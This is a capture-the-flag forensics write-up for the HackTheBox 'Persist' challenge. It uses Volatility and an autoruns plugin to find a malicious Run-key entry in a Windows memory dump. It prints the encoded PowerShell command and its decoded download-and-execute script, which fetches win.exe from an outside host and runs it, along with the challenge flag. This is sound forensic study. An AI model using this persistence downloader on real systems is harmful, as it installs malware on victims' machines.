Persist

Event: Cyber Santa is Coming to Town – 2021 HackTheBox

Category: Forensics

PTS: 300

Description:

Although Santa just updated his infra, problems still occur. He keeps complaining about slow boot time and a blue window popping up for a split second during startup. The IT elves support suggested that he should restart his computer. Ah, classic IT support!


Inside the zip file there’s a .raw file, the same thing that we’ve seen previously in the honeypot challenge so let’s roll with the same modus operandi

volatility -f ./persist.raw imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/grizzly/codice/hacking/ctf/cyber_santa_is_coming_htb/forensics_persist/persist.raw)
                      PAE type : PAE
                           DTB : 0x185000L
                          KDBG : 0x82977c68L
          Number of Processors : 1
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0x82978d00L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2021-11-30 22:05:35 UTC+0000
     Image local date and time : 2021-11-30 14:05:35 -0800

We know that we’re dealing with an OS dump and we’re looking for something that appears at the boot, probably a Powershell script (from the blue of the pop up window) but there’s no default modules for helping us with that type of research, maybe the community already faced this type of problem, let’s check the internet.

http://tomchop.me/2014/09/18/volatility-autoruns/

They did, using this simple plugin following the instruction on the website this should be your command – or at least similar – :

volatility --plugins=volatility-autoruns/ --profile=Win7SP1x86_23418  -f ./persist.raw --plugins=volatility-autoruns/  autoruns


As you can see we have something called by powershell under the ntuser.dat HIVE:

Hive: \??\C:\Users\Santa\ntuser.dat 
    Software\Microsoft\Windows\CurrentVersion\Run (Last modified: 2021-11-30 22:04:29 UTC+0000)
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc JABQAGEAdABoACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdwBpAG4AZABvAHcAcwBcAHcAaQBuAC4AZQB4AGUAJwA7AGkAZgAgACgALQBOAE8AVAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABQAGEAdABoACAALQBQAGEAdABoAFQAeQBwAGUAIABMAGUAYQBmACkAKQB7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAFAAYQB0AGgAfQBlAGwAcwBlAHsAbQBrAGQAaQByACAAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXAB3AGkAbgBkAG8AdwBzACcAOwAkAGYAbABhAGcAIAA9ACAAIgBIAFQAQgB7AFQAaAAzAHMAMwBfADMAbAB2ADMAcwBfADQAcgAzAF8AcgAzADQAbABsAHkAXwBtADQAbAAxAGMAMQAwAHUAcwB9ACIAOwBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAcwA6AC8ALwB3AGkAbgBkAG8AdwBzAGwAaQB2AGUAdQBwAGQAYQB0AGUAcgAuAGMAbwBtAC8AdwBpAG4ALgBlAHgAZQAiACwAJABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABQAGEAdABoAH0AJQA=

It’s obviously a base64 encoded script, decoding it will produce the following output:

$.P.a.t.h. .=. .'.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.w.i.n.d.o.w.s.\.w.i.n...e.x.e.'.;.i.f. .(.-.N.O.T.(.T.e.s.t.-.P.a.t.h. .-.P.a.t.h. .$.P.a.t.h. .-.P.a.t.h.T.y.p.e. .L.e.a.f.).).{.S.t.a.r.t.-.P.r.o.c.e.s.s. .$.P.a.t.h.}.e.l.s.e.{.m.k.d.i.r. .'.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.w.i.n.d.o.w.s.'.;.$.f.l.a.g. .=. .".H.T.B.{.T.h.3.s.3._.3.l.v.3.s._.4.r.3._.r.3.4.l.l.y._.m.4.l.1.c.1.0.u.s.}.".;.i.e.x. .(.N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.)...D.o.w.n.l.o.a.d.F.i.l.e.(.".h.t.t.p.s.:././.w.i.n.d.o.w.s.l.i.v.e.u.p.d.a.t.e.r...c.o.m./.w.i.n...e.x.e.".,.$.P.a.t.h.).;.S.t.a.r.t.-.P.r.o.c.e.s.s. .$.P.a.t.h.}.%.

Which cleaned out looks like this:

$Path = 'C:\ProgramData\windows\win.exe';if (-NOT(Test-Path -Path $Path -PathType Leaf)){Start-Process $Path}else{mkdir 'C:\ProgramData\windows';$flag = "HTB{Th3s3_3lv3s_4r3_r34lly_m4l1c10us}";iex (New-Object System.Net.WebClient).DownloadFile("https://windowsliveupdater.com/win.exe",$Path);Start-Process $Path}%

With our flag in clear.
This was pretty smooth thanks to the time used on the honeypot challenge, we came in strong from that.